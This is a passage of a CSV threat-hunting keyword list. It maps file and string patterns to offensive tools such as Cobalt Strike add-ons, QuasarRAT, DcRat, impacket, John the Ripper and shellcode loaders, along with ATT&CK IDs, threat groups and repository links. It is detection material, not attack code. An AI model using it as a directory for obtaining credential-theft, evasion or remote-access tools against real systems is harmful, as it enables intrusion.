and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*qtc-de/remote-method-guesser*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*QUAPCInjectAsSystem*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*QUAPCInjectElevated*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" 
+"*QUAPCInjectFakecmd*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*QUAPCInjectFakecmd*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*QUAPCInjectWithoutPid*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*Quasar.Client.*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.exe*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.Server*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.sln*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*quasar/Quasar*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar-master.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. 
The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*QuasarRAT*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*quentinhardy*msdat*","offensive_tool_keyword","MSDAT","MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.","T1110 - T1059 - T1210 - T1047","TA0002 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/quentinhardy/msdat","1","1","N/A","N/A","8","764","144","2023-08-01T10:54:24Z","2018-02-15T12:34:57Z" +"*quser.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*quser.x86.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*qwinsta /server:*","greyware_tool_keyword","qwinsta","enumerate rdp session on a remote server","T1049 - T1018 - T1021.001","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","N/A","1","0","N/A","3","8","N/A","N/A","N/A","N/A" +"*qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*qwqdanchun/DcRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA*","offensive_tool_keyword","mimikatz","invoke mimiaktz string found used by the tool EDRaser ","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*QXh4OEF4eDhBeHg4QXh4OA==*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" +"*r00t-3xp10it*","offensive_tool_keyword","Github Username","Pentest hosting multiple offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*r0oth3x49/Tor.git*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" +"*r1cksec/thoth*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - 
T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*r2pm -i dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" +"*r4wd3r/Suborner*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" +"*Radare2*","offensive_tool_keyword","Radare2","r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. 
attaching to remote gdb servers","T1057 - T1064 - T1059 - T1202","TA0002 - TA0008 - TA0001","N/A","N/A","Information Gathering","https://github.com/radareorg/radare2","1","0","N/A","N/A","10","18645","2913","2023-10-04T08:34:11Z","2012-07-03T07:42:26Z"
+"*radius2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*radius2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*RAI/ase_docker*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
+"*rai-attack-servers.*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
+"*RainbowCrack*","offensive_tool_keyword","RainbowCrack","The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one. which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called rainbow tables. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. For downloads and more information. 
visit the RainbowCrack homepage","T1110 - T1208 - T1212 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://project-rainbowcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*rai-redirector-dns*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
+"*rai-redirector-http*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
+"*raiseChild.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*rajkumardusad/onex*","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A",,"N/A",,,
+"*rajkumardusad/Tool-X*","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. 
Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A",,"N/A",,,
